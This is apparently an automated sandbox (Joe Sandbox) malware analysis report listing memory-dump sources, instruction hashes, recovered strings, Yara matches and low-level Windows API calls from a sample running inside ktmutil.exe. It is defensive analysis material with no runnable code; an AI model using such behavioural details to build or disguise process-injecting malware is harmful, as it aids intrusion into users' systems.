                                                • Instruction ID: 79adf1de02c7f36378480e2c28d365a86ecb36458831ba9b1af2d77910cf0912
                                                • Opcode Fuzzy Hash: 2178631da5fc8e0a8a89d7700d4c4b634ee53257f18bca5dfd2dbdb3406ddbee
                                                • Instruction Fuzzy Hash: F0412EB0D0032C9EEB60DFA58884BEEBBB9FF05748F104199D50DAA241E7B55B88CF55
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.4588318441.0000000004C60000.00000040.00000001.00040000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_4c60000_MqDMLUHvZmSMqiwTfIsHo.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: :$:$:$A$I$N$P$m$s$t
                                                • API String ID: 0-2304485323
                                                • Opcode ID: 47ee5f6ff09a467927290e7322133e4de622052b3b62449f4dd45adf142550f8
                                                • Instruction ID: 84efbd3bba468549c45a95a95c21586e69ecf82714c42119d9432bfd52d2bd94
                                                • Opcode Fuzzy Hash: 47ee5f6ff09a467927290e7322133e4de622052b3b62449f4dd45adf142550f8
                                                • Instruction Fuzzy Hash: 71D10CB2900315AFEB14DFA4CC81FEEB3BAAF48314F14851DE51AE7140EB74B9458B64
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.4588318441.0000000004C60000.00000040.00000001.00040000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_4c60000_MqDMLUHvZmSMqiwTfIsHo.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: :$:$:$A$I$N$P$m$s$t
                                                • API String ID: 0-2304485323
                                                • Opcode ID: 5ac955e9ed3b95e16f9d1ec7d9385f18547964398ae655a1f4f463f3bae88422
                                                • Instruction ID: e7858ad1258bf60f01a3735a58444539f3aba3de88f78d457d299af86afac037
                                                • Opcode Fuzzy Hash: 5ac955e9ed3b95e16f9d1ec7d9385f18547964398ae655a1f4f463f3bae88422
                                                • Instruction Fuzzy Hash: A4811DB1900318AFEB14DFE4C881BEEB7BAAF48314F14851DE519E7240EB75AA45CB64
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.4588318441.0000000004C60000.00000040.00000001.00040000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_4c60000_MqDMLUHvZmSMqiwTfIsHo.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: L$S$\$a$c$e$l
                                                • API String ID: 0-3322591375
                                                • Opcode ID: 826988136ecf225063e2fa90149ffbb2a38eb4c65134dde76c4d29e2385dda6c
                                                • Instruction ID: ca84a3090cf1cb4ef1a54a67afabceb99f24961433939af5fb688724731ead16
                                                • Opcode Fuzzy Hash: 826988136ecf225063e2fa90149ffbb2a38eb4c65134dde76c4d29e2385dda6c
                                                • Instruction Fuzzy Hash: C541AB72C10218AADB10DFA4DCC4ADEB7FAEF44314F01855ED80EA7110EB716A418FD5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.4588318441.0000000004C60000.00000040.00000001.00040000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_4c60000_MqDMLUHvZmSMqiwTfIsHo.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: L$S$\$a$c$e$l
                                                • API String ID: 0-3322591375
                                                • Opcode ID: 124a963ca69eed553af8cb630a341a5fdc9d1ecb3d327fcbdafbf76ccdc8162d
                                                • Instruction ID: d5314e060980412dd7a69aa439d58df2560a9d05af353a461b9a284b0d80cc20
                                                • Opcode Fuzzy Hash: 124a963ca69eed553af8cb630a341a5fdc9d1ecb3d327fcbdafbf76ccdc8162d
                                                • Instruction Fuzzy Hash: F0317272C10218AADB50DFA4CCC4BDEB7F6FF48704F05866EE91AA7110EB716A418F95
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.4588318441.0000000004C60000.00000040.00000001.00040000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_4c60000_MqDMLUHvZmSMqiwTfIsHo.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: .dll$.dll$WAt$bIW
                                                • API String ID: 0-4102820332
                                                • Opcode ID: b179bc2f3fc1c73d61f2b31d966864737c10c6250e58698f07c98b0c2fc9e2b2
                                                • Instruction ID: 949ab817d6e8dc4c595aae6baba3910c4df59291c5512d6269485e7f6e293664
                                                • Opcode Fuzzy Hash: b179bc2f3fc1c73d61f2b31d966864737c10c6250e58698f07c98b0c2fc9e2b2
                                                • Instruction Fuzzy Hash: 8B5164B0C092699EEB619F558C80BEDBBB9FF46304F0485D9C49DAB201D7782B85CF91

                                                Execution Graph

                                                Execution Coverage:2.6%
                                                Dynamic/Decrypted Code Coverage:3.9%
                                                Signature Coverage:1.4%
                                                Total number of Nodes:493
                                                Total number of Limit Nodes:79

                                                Control-flow Graph

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4586829537.0000000000180000.00000040.80000000.00040000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_180000_ktmutil.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: #E$)$),$+$-$-$-z$.D$1$3o$8C$B$BM$C$C$Fb$I$J$OL$S$[g$aK$e$nt$o$o$re$s$z${$}$-
                                                • API String ID: 0-2918677885
                                                • Opcode ID: 59febbfa21df76e89e8bf0455bb3d5c1759b8ceea10f358143a9d4ab36c3e6f1
                                                • Instruction ID: 65e75aa1f990847e93e5b5287e1dc895b4e37b91a49bfc7b02bc905ea48c1e42
                                                • Opcode Fuzzy Hash: 59febbfa21df76e89e8bf0455bb3d5c1759b8ceea10f358143a9d4ab36c3e6f1
                                                • Instruction Fuzzy Hash: 7D32BEB0D05229CBEB28DF45C894BEDBBB2BB54308F2481D9D1096B280C7B95EC9DF55
                                                APIs
                                                • FindFirstFileW.KERNELBASE(?,00000000), ref: 0019C1C4
                                                • FindNextFileW.KERNELBASE(?,00000010), ref: 0019C1FF
                                                • FindClose.KERNELBASE(?), ref: 0019C20A
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4586829537.0000000000180000.00000040.80000000.00040000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_180000_ktmutil.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Find$File$CloseFirstNext
                                                • String ID:
                                                • API String ID: 3541575487-0
                                                • Opcode ID: 9085d8d55db55216a895d1f3115b131c486a89e067bf56a09898adbb3f315dba
                                                • Instruction ID: 61cdc79b17e27c7204c6ed364329f342fef637ab2a1cc680d2a8e18ef30e4d7e
                                                • Opcode Fuzzy Hash: 9085d8d55db55216a895d1f3115b131c486a89e067bf56a09898adbb3f315dba
                                                • Instruction Fuzzy Hash: DB316375A00309BBDB20EBA4CC85FFB777CAF54704F144459B959A7181DB70AA848BE0
                                                APIs
                                                • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 001A7FA0
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4586829537.0000000000180000.00000040.80000000.00040000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_180000_ktmutil.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID:
                                                • API String ID: 823142352-0
                                                • Opcode ID: da791fb94ec58518efa8e9fadd5c188485ef03268c0321174b3b9fece813e00f
                                                • Instruction ID: 90ac2df26f5b603c0bb042f4fcc42007ef39c208763b380c480ad5992f3b5c7b
                                                • Opcode Fuzzy Hash: da791fb94ec58518efa8e9fadd5c188485ef03268c0321174b3b9fece813e00f
                                                • Instruction Fuzzy Hash: 1731A2B5A01609AFCB14DFA9DC81EDFB7B9AF9D310F108219F918A3341D730A951CBA5
                                                APIs
                                                • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 001A80E8
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4586829537.0000000000180000.00000040.80000000.00040000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_180000_ktmutil.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                • Opcode ID: 602a6e3a6495a8a5e16f36f8f0e3e61c99e5a3b2dc827b6046af5244c5e0acd5
                                                • Instruction ID: 3a48db022bebde781cac328eaf89077d8fd87dd2d6fb7b91872e1851035d3b31
                                                • Opcode Fuzzy Hash: 602a6e3a6495a8a5e16f36f8f0e3e61c99e5a3b2dc827b6046af5244c5e0acd5
                                                • Instruction Fuzzy Hash: 2131E6B5A00608AFCB14DF99D881EEFB7B9EF8C314F108209FD18A7241D730A951CBA4
                                                APIs
                                                • NtAllocateVirtualMemory.NTDLL(00191CAE,?,001A6F87,00000000,00000004,00003000,?,?,?,?,?,001A6F87,00191CAE,00000000,?,001A09C1), ref: 001A839D
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4586829537.0000000000180000.00000040.80000000.00040000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_180000_ktmutil.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateMemoryVirtual
                                                • String ID:
                                                • API String ID: 2167126740-0
                                                • Opcode ID: cad502733431af35e45b41efeab791e2941bba04f50a49f517a9b9f77782e44b
                                                • Instruction ID: 5b64eeba96a0a8c529dc93e18ec04eeca82af4299234c994a7dd083772c0a7d2
                                                • Opcode Fuzzy Hash: cad502733431af35e45b41efeab791e2941bba04f50a49f517a9b9f77782e44b
                                                • Instruction Fuzzy Hash: D12139B5A00208AFDB10EF58DC81EEFB7B9EF99710F108509FD18A7241D730A951CBA1
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4586829537.0000000000180000.00000040.80000000.00040000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_180000_ktmutil.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: DeleteFile
                                                • String ID:
                                                • API String ID: 4033686569-0
                                                • Opcode ID: aaf37d85049db96e7b3b01076ccea28055efda21774638674b635c7cda7f6a90
                                                • Instruction ID: 70b71540fb835566771e1996e1562bae778258b2e68c27b8a94376bfea75206b
                                                • Opcode Fuzzy Hash: aaf37d85049db96e7b3b01076ccea28055efda21774638674b635c7cda7f6a90
                                                • Instruction Fuzzy Hash: E601C036A416047FD220EB68DC42FEB77ACDF96310F404509FA1897282DB717941CBE1
                                                APIs
                                                • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 001A81C4
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4586829537.0000000000180000.00000040.80000000.00040000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_180000_ktmutil.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Close
                                                • String ID:
                                                • API String ID: 3535843008-0
                                                • Opcode ID: 4c66793653d15117f357d01f0f2892b2c5ef3b68542122b1a45f0b0588971228
                                                • Instruction ID: 53c2e0b4775d36514d703b5d8a4ba2d37fd7687b73c5d68510157412e023d3eb
                                                • Opcode Fuzzy Hash: 4c66793653d15117f357d01f0f2892b2c5ef3b68542122b1a45f0b0588971228
                                                • Instruction Fuzzy Hash: B5E08C362406047BC220FA99CC01FDBB7ACDFC5765F008016FA08A7242D770BA058BF0
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4588745880.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                • Associated: 00000009.00000002.4588745880.0000000002C49000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000009.00000002.4588745880.0000000002C4D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000009.00000002.4588745880.0000000002CBE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b20000_ktmutil.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: c1d7afd86f4ff0f9f7c043d2373a50ce9234ee2d908ba6418c153111c9af85f9
                                                • Instruction ID: 4762c501a4bde1e3e6a954828a79b7f4300238954dac09bab763e49390b8f7f7
                                                • Opcode Fuzzy Hash: c1d7afd86f4ff0f9f7c043d2373a50ce9234ee2d908ba6418c153111c9af85f9
                                                • Instruction Fuzzy Hash: 59900272B0980012914071988894547500597E0301B55C051E0534595C8A148A565361
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4588745880.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                • Associated: 00000009.00000002.4588745880.0000000002C49000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000009.00000002.4588745880.0000000002C4D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000009.00000002.4588745880.0000000002CBE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b20000_ktmutil.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 8ee4a30a7446ba33e840894977da9cf21121788d49ce1297df6136e3bab10c78
                                                • Instruction ID: 4042b65e821aac4a4ad8aa79d446a5bd4193d3896c716ca755abb8f84b8dadf4
                                                • Opcode Fuzzy Hash: 8ee4a30a7446ba33e840894977da9cf21121788d49ce1297df6136e3bab10c78
                                                • Instruction Fuzzy Hash: E19002A2B0550042414071988814407700597E1301395C155A06645A1C861889559269
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4588745880.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                • Associated: 00000009.00000002.4588745880.0000000002C49000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000009.00000002.4588745880.0000000002C4D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000009.00000002.4588745880.0000000002CBE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b20000_ktmutil.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 6c0d741572058563a29096074194348c3bdb04f872885761c26ef263639ac509
                                                • Instruction ID: f7998c8d5c579ea22c5a750f599a93dd60235732ba95151502e46c113793451b
                                                • Opcode Fuzzy Hash: 6c0d741572058563a29096074194348c3bdb04f872885761c26ef263639ac509
                                                • Instruction Fuzzy Hash: F4900266725400020145B598461450B144597D6351395C055F15265D1CC62189655321
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4588745880.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                • Associated: 00000009.00000002.4588745880.0000000002C49000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000009.00000002.4588745880.0000000002C4D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000009.00000002.4588745880.0000000002CBE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b20000_ktmutil.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 5fd1b6e1216fca5b64726af806e11ab5788e66639b1f3293997bdcf8e587f6be
                                                • Instruction ID: 6b65b9a083768d82d25b6a03c04ed7c3438135243c5c3f85a34a2f67c4075558
                                                • Opcode Fuzzy Hash: 5fd1b6e1216fca5b64726af806e11ab5788e66639b1f3293997bdcf8e587f6be
                                                • Instruction Fuzzy Hash: FD900477715400030105F5DC47145071047C7D5351355C071F11355D1CD731CD715131
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4588745880.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                • Associated: 00000009.00000002.4588745880.0000000002C49000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000009.00000002.4588745880.0000000002C4D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000009.00000002.4588745880.0000000002CBE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b20000_ktmutil.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: ea975b9f393093c01347e4ca422b11d63e59889c9b490ad3039ac305e93919f9
                                                • Instruction ID: 87d417e195cb1e2df168391a8b600c8161045770696af4eafdabd894ee338072
                                                • Opcode Fuzzy Hash: ea975b9f393093c01347e4ca422b11d63e59889c9b490ad3039ac305e93919f9
                                                • Instruction Fuzzy Hash: FD900272B0940802D15071988424747100587D0301F55C051A0134695D87558B5576A1
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4588745880.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                • Associated: 00000009.00000002.4588745880.0000000002C49000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000009.00000002.4588745880.0000000002C4D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000009.00000002.4588745880.0000000002CBE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b20000_ktmutil.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 8315b97f6211b5d7bc2d1676926560f8e21e90aab1ddbdca8009c6ef4bd4a7ab
                                                • Instruction ID: 0c5983b955f6f2924d42ea9f33bdeb94d648edfcc03287008fe44df50b286ae0
                                                • Opcode Fuzzy Hash: 8315b97f6211b5d7bc2d1676926560f8e21e90aab1ddbdca8009c6ef4bd4a7ab
                                                • Instruction Fuzzy Hash: 6B90027270540802D1807198841464B100587D1301F95C055A0135695DCA158B5977A1
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4588745880.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                • Associated: 00000009.00000002.4588745880.0000000002C49000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000009.00000002.4588745880.0000000002C4D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000009.00000002.4588745880.0000000002CBE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b20000_ktmutil.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: d48921376e2b30b39c827e0d2fdf17c0d28d1c150f105f66b7685b4129ad4eb4
                                                • Instruction ID: b8a1378d9f900ef9727434b551bd67a880641a07c169e6470917e2373db7165c
                                                • Opcode Fuzzy Hash: d48921376e2b30b39c827e0d2fdf17c0d28d1c150f105f66b7685b4129ad4eb4
                                                • Instruction Fuzzy Hash: D590027270944842D14071988414A47101587D0305F55C051A01746D5D96258E55B661
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4588745880.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                • Associated: 00000009.00000002.4588745880.0000000002C49000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000009.00000002.4588745880.0000000002C4D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000009.00000002.4588745880.0000000002CBE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b20000_ktmutil.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 736d21f54993cc21a1731ebbb0320b15bc319855f43bd7066161bc316053fb17
                                                • Instruction ID: 9be4d90ce5ccecf352afdc10951ee3fb9ea1130caf49de6d4110b37835f85c76
                                                • Opcode Fuzzy Hash: 736d21f54993cc21a1731ebbb0320b15bc319855f43bd7066161bc316053fb17
                                                • Instruction Fuzzy Hash: 6A9002A270640003410571988424617500A87E0201B55C061E11245D1DC52589916125
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4588745880.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                • Associated: 00000009.00000002.4588745880.0000000002C49000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000009.00000002.4588745880.0000000002C4D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000009.00000002.4588745880.0000000002CBE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b20000_ktmutil.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 5683c1e29c3b96fc4e020b4353522b6a79861bdc13c6c8e1e2bce31911746900
                                                • Instruction ID: 71251f00d7bae9b218bea10226802e008e19346c27f86de6771df011c4c9e6cd
                                                • Opcode Fuzzy Hash: 5683c1e29c3b96fc4e020b4353522b6a79861bdc13c6c8e1e2bce31911746900
                                                • Instruction Fuzzy Hash: FE900262B0540502D10171988414617100A87D0241F95C062A1134596ECA258A92A131
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4588745880.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                • Associated: 00000009.00000002.4588745880.0000000002C49000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000009.00000002.4588745880.0000000002C4D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000009.00000002.4588745880.0000000002CBE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b20000_ktmutil.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: f390687f0af998f5b599cf907650626fb108a6f65dae631fefe69ce2ffdd2f38
                                                • Instruction ID: adb60426389de55df01027e6829dc3965a8832b22c540637efbbba6d076bd493
                                                • Opcode Fuzzy Hash: f390687f0af998f5b599cf907650626fb108a6f65dae631fefe69ce2ffdd2f38
                                                • Instruction Fuzzy Hash: AF9002A270580403D14075988814607100587D0302F55C051A2174596E8A298D516135
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4588745880.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                • Associated: 00000009.00000002.4588745880.0000000002C49000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000009.00000002.4588745880.0000000002C4D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000009.00000002.4588745880.0000000002CBE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b20000_ktmutil.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 45204482ff1850b6f725b2e4a60c34f5ba46889afd8fd59ab8322d1c7391a2ff
                                                • Instruction ID: 6cdf05b2a3e88b2dcf853828a28767b5a06768ea84b0df2a1036e8dd8e60b9df
                                                • Opcode Fuzzy Hash: 45204482ff1850b6f725b2e4a60c34f5ba46889afd8fd59ab8322d1c7391a2ff
                                                • Instruction Fuzzy Hash: 24900262B0540042414071A8C8549075005ABE1211755C161A0AA8591D855989655665
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4588745880.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                • Associated: 00000009.00000002.4588745880.0000000002C49000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000009.00000002.4588745880.0000000002C4D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000009.00000002.4588745880.0000000002CBE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b20000_ktmutil.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 3b1371ac81df9ed21ff8c005a0147964d6b5b852934c4e0cd68490af1501c8c0
                                                • Instruction ID: d14a9f2a7916e2d9de4054a1ab7ebaed3344868e5f7f96a464a3eca22895fd5a
                                                • Opcode Fuzzy Hash: 3b1371ac81df9ed21ff8c005a0147964d6b5b852934c4e0cd68490af1501c8c0
                                                • Instruction Fuzzy Hash: 6B900262715C0042D20075A88C24B07100587D0303F55C155A0264595CC91589615521
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4588745880.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                • Associated: 00000009.00000002.4588745880.0000000002C49000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000009.00000002.4588745880.0000000002C4D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000009.00000002.4588745880.0000000002CBE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b20000_ktmutil.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 57b20086111075a7c7f55b62b3669aaf96af6dd1e8698b144fc55707efb502e2
                                                • Instruction ID: a4fa13179dc3ba7d353fbacdf5219a97b48e8dfc17c971ff1ce32fbff46fd82f
                                                • Opcode Fuzzy Hash: 57b20086111075a7c7f55b62b3669aaf96af6dd1e8698b144fc55707efb502e2
                                                • Instruction Fuzzy Hash: 019002A274540442D10071988424B071005C7E1301F55C055E1174595D8619CD526126

                                                Control-flow Graph (legend: Executed / Not Executed)
                                                APIs
                                                • PostThreadMessageW.USER32(07c402-5,00000111,00000000,00000000), ref: 00190DC7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4586829537.0000000000180000.00000040.80000000.00040000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_180000_ktmutil.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID: )bvl$07c402-5$07c402-5
                                                • API String ID: 1836367815-996227108
                                                • Opcode ID: 1bb382ac99e2e117969a6b7b7ff2c9a69cb58911ca77f0a0a4c719dabe7b5848
                                                • Instruction ID: 26b82cfdd2e4f8d6594959420adb77427861046be767c1ad6f6787f3a2cd6d02
                                                • Opcode Fuzzy Hash: 1bb382ac99e2e117969a6b7b7ff2c9a69cb58911ca77f0a0a4c719dabe7b5848
                                                • Instruction Fuzzy Hash: FC11C2B2D0024C7AEB11AAD58C82DAF7B7CDF51394F048058F900A7641D7345E0687F1

                                                Control-flow Graph (legend: Executed / Not Executed)
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4586829537.0000000000180000.00000040.80000000.00040000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_180000_ktmutil.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: 07c402-5$07c402-5
                                                • API String ID: 0-1844765358
                                                • Opcode ID: 93f2b516c6f34a662fc0b22232382f46d89ca921868007fbdb14976cd4e60deb
                                                • Instruction ID: a3aa20320031776ecd15af5608264140913041873368c5bfb0c924875dff993b
                                                • Opcode Fuzzy Hash: 93f2b516c6f34a662fc0b22232382f46d89ca921868007fbdb14976cd4e60deb
                                                • Instruction Fuzzy Hash: 0341E1739452496FDB039BA8CC829DEBBB8EF91314B184299E4549B142D325DD07CBD1

                                                Control-flow Graph (legend: Executed / Not Executed)
                                                APIs
                                                • PostThreadMessageW.USER32(07c402-5,00000111,00000000,00000000), ref: 00190DC7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4586829537.0000000000180000.00000040.80000000.00040000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_180000_ktmutil.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID: 07c402-5$07c402-5
                                                • API String ID: 1836367815-1844765358
                                                • Opcode ID: 0312851da5a049d7c285c468280f46ea732cd954ace3ab867c1355badc4b913e
                                                • Instruction ID: d1e9643a4a5cd53461f5692adb0bde4b702faa4afa531db276b84f31611fde3f
                                                • Opcode Fuzzy Hash: 0312851da5a049d7c285c468280f46ea732cd954ace3ab867c1355badc4b913e
                                                • Instruction Fuzzy Hash: 9E0184B2D0024C7AEB11AAE48C82DEF7B7CDF55794F448069FA14B7141D7745E068BB1
                                                APIs
